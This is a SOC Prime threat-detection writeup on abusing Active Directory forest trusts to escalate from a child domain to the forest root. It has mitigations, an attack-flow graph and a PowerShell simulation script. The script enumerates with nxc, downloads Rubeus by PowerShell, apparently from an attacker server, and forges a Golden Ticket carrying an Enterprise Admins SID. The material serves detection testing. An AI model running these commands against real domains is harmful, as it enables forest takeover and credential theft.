SOC Prime Bias: Critical

01 Jul 2026 09:11 UTC

Active Directory Forest Trust Abuse and Child-to-Root Escalation

Author Photo
SOC Prime Team linkedin icon Follow
Active Directory Forest Trust Abuse and Child-to-Root Escalation
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

This technical walkthrough shows how an attacker with Domain Admin privileges in a child domain can escalate to administrative control of the Forest Root. The attack abuses bidirectional intra-forest trusts and permissive SID filtering to inject Enterprise Admin SIDs into forged Kerberos tickets. It also explains how coercion methods such as PetitPotam can be leveraged to capture machine account tickets and enable DCSync attacks.

Investigation

The report describes a lab-based engagement in which the attacker begins in the pentest.ignite.local child domain. The workflow includes enumerating forest trusts, extracting the krbtgt hash, forging a Golden Ticket with SID History, and executing a DCSync attack against the parent ignite.local domain. A secondary escalation path using the PetitPotam coercion technique is also demonstrated.

Mitigation

Recommended mitigations include treating all domain controllers as tier-zero assets and rotating the krbtgt password twice on a regular basis across the forest. Organizations should enforce SID filtering on trusts, disable unconstrained delegation, and turn off the Print Spooler service on domain controllers. Additional hardening steps include using the Protected Users group for Kerberos protection and monitoring for abnormal DRSUAPI replication activity.

Response

If DCSync activity or unauthorized Kerberos ticket use is detected, responders should immediately isolate impacted domain controllers and begin a double krbtgt password reset. All accounts with Enterprise Admin privileges should be investigated, and the environment should be checked for tools such as Rubeus or PetitPotam. Authentication logs should also be reviewed for unusual machine account behavior and possible coercion-related events.

"flowchart TD step_persistence_foothold["Persistence & Foothold: Create new user and add to Domain Admins (net user /add, net group /add)"] step_discovery["T1087 u2013 Account Discovery: Map forest structure and trust relationships (nltest, bloodyAD)"] rules_for_discovery("<b>Rule Name</b>: Probable Use of Windows Hacktools [Part3] (via file_event)<br/><b>Rule ID</b>: 804c1bdd-1345-4557-975e-8e5c4ca71745") step_credential_access_ntds["T1003 u2013 OS Credential Dumping: Extract child domain krbtgt hash (nxc smb –ntds)"] rules_for_credential_access("<b>Rule Name</b>: Probable Use of Windows Hacktools [Part3] (via file_event)<br/><b>Rule ID</b>: 804c1bdd-1345-4557-975e-8e5c4ca71745") step_golden_ticket["T1558.003 u2013 Steal or Forge Kerberos Tickets: Golden Ticket with Enterprise Admins SID (Rubeus.exe)"] step_lateral_movement["T1550 u2013 Use Alternate Authentication Material: Pass the Ticket to forest root (Rubeus.exe ptt)"] step_dcsync_root["T1003 u2013 OS Credential Dumping: DCSync forest root NTDS.DIT (impacket-secretsdump)"] rules_for_credential_access("<b>Rule Name</b>: Probable Use of Windows Hacktools [Part3] (via file_event)<br/><b>Rule ID</b>: 804c1bdd-1345-4557-975e-8e5c4ca71745") step_coercion_petitpotam{"T1556 u2013 Modify Authentication Process: PetitPotam coercion (PetitPotam.py)"} step_capture_machine_ticket["T1558 u2013 Steal or Forge Kerberos Tickets: Capture forest root machine account ticket (Rubeus.exe monitor)"] step_dcsync_coercion["T1003 u2013 OS Credential Dumping: DCSync using captured machine ticket (impacket-secretsdump)"] rules_for_credential_access("<b>Rule Name</b>: Probable Use of Windows Hacktools [Part3] (via file_event)<br/><b>Rule ID</b>: 804c1bdd-1345-4557-975e-8e5c4ca71745") step_persistence_foothold –>|leads_to| step_discovery step_discovery –>|leads_to| step_credential_access_ntds step_credential_access_ntds –>|leads_to| step_golden_ticket step_golden_ticket –>|leads_to| step_lateral_movement step_lateral_movement –>|leads_to| step_dcsync_root step_dcsync_root –>|alternative_path| step_coercion_petitpotam step_coercion_petitpotam –>|leads_to| step_capture_machine_ticket step_capture_machine_ticket –>|leads_to| step_dcsync_coercion step_discovery -.->|detected_by| rules_for_discovery step_credential_access_ntds -.->|detected_by| rules_for_credential_access step_dcsync_root -.->|detected_by| rules_for_credential_access step_dcsync_coercion -.->|detected_by| rules_for_credential_access "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has gained a foothold in a child domain (pentest.ignite.local). To escalate to the forest root, they first use nxc (NetExec) to list Domain Controllers via LDAP to map the target environment. Next, they use powershell to download Rubeus.exe from a remote attacker-controlled server. Finally, they execute Rubeus.exe to forge a Golden Ticket. The forged ticket contains the SID of the forest root domain (S-1-5-21-2964257136-1039789743-457275023) to allow the adversary to impersonate a forest administrator when interacting with the root domain.

  • Regression Test Script:

    # Simulation of Forest Trust Abuse to trigger the specific Sigma rule
    
    # 1. Simulate NetExec LDAP Enumeration
    # Note: We call 'nxc' via a dummy execution to mimic the command line signature
    Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow
    
    # 2. Simulate Rubeus Download via PowerShell
    # This matches the exact string: 'powershell wget http://Rubeus.exe -o Rubeus.exe'
    Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow
    
    # 3. Simulate Rubeus Golden Ticket Forgery
    # This matches the exact complex string required by the detection rule
    $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket"
    Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow
  • Cleanup Commands:

    # Remove the downloaded Rubeus file and any dummy artifacts
    Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue
    Remove-Item -Path "ticket" -ErrorAction SilentlyContinue